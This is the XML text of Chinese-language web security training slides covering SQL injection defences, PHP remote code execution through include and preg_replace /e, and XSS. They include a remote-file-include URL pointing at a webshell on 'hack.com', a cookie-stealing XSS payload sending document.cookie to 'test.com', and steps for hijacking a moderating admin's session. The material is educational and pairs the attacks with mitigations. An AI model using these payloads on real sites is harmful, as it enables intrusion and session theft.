              <a:t>永远不要使用超级用户或所有者帐号去连接数据库。要用权限被严格限制的帐号。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>限定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>的帐号权限，不要让</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>帐号可以读写其他敏感文件。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dirty="0" err="1" smtClean="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>oadfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>(),into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>就因无权限而失效。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>保存查询日志，定期检查日志。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zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>日志不能防止注入，但是定期查看日志，能追踪到哪个程序曾经被尝试攻击过。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="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u"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>(Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" smtClean="0"/>
              <a:t>Scripting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="0" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="u"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0" smtClean="0"/>
              <a:t>远程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0"/>
              <a:t>代码执行漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern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远程代码执行漏洞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Include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>($_GET[‘type’] . “_action.php”) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>patt,$replace,$string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>);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远程代码执行漏洞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0" dirty="0" smtClean="0"/>
              <a:t>include($_GET[‘type’] . “_action.php”) ;</a:t>
            </a:r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?type=http://hack.com/webshell.txt?action=</a:t>
            </a:r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webshell.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php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phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>	…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>其他你想执行的任意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>代码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?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="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远程代码执行漏洞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0" dirty="0" err="1" smtClean="0"/>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>patt,$replacement,$string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>手册：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>/e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>修正符使 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>preg_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>将 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0" smtClean="0"/>
              <a:t>replacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>参数当作 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>代码（在适当的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>逆向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引用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>替换完之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>patt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$replacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>参数来自用户输入，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>用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户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>可以构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>/e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>修正符和想执行的任意代码。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如：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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>patt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> = “/.*?/e”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>$replacement  = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>phpinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>();”;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远程代码执行漏洞预防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严格过滤任何用户输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>禁止远程文件包含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	 Whether to allow include/require to open URLs (like http:// or ftp://) as files.</a:t>
            </a:r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allow_url_include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> = Off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>限制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权限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进程的权限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当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>以模块形式运行时，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权限是运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>的进程的用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>形式运行时，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权限是运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php-cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>的进程的用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>php-cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>已</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>用户权限运行，那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权限就相当于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>权限，用户可以随意在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上干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>可以干的任何事情。</a:t>
            </a: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一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>个绝对安全的系统是不存在的，但不要因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此放弃一切努力，渐进式地提高系统的安全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系数吧！！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5400" dirty="0" smtClean="0"/>
              <a:t>Q&amp;A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原理：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>可以在用户本地执行任意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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b="1" dirty="0" smtClean="0"/>
              <a:t>分类：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>非持久型和持久型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="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持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>漏洞一般存在于用户交互功能，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如发帖留言等，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>内容经正常功能进入数据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库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>持久保存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zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>非持久型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>漏洞一般存在于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>中，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需要访问构造好的特定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>才能触发漏洞。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非持久型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index.php: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/>
              <a:t>name = $_GET['name'];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/>
              <a:t>"Welcome $name&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;";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“&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=‘http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>baidu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/’&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt;";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?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty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用户请求：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/>
              <a:t>index.php?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=guest&lt;script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('attacked')&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下面蓝色部分表示用户通过表单填写的输入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个友好的用户：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&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>今天心情不错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>&lt;/span&gt;</a:t>
            </a:r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个恶意的用户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&lt;span</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“http://test.com/c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ookie.php?c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cokie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>&lt;/span&gt;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0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>假定一个评论站点，内容需要审核后才能发布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0" dirty="0" smtClean="0"/>
              <a:t>Step 1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>，写到评论里去。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Step 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>审核管理员打开评论，页面自动请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t> exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>refer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cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>top.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>等信息提交到攻击者的指定的接口。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Step 3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>根据获取到的这些信息，分析出后台地址。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Step 4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0" smtClean="0"/>
              <a:t>利用窃取的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
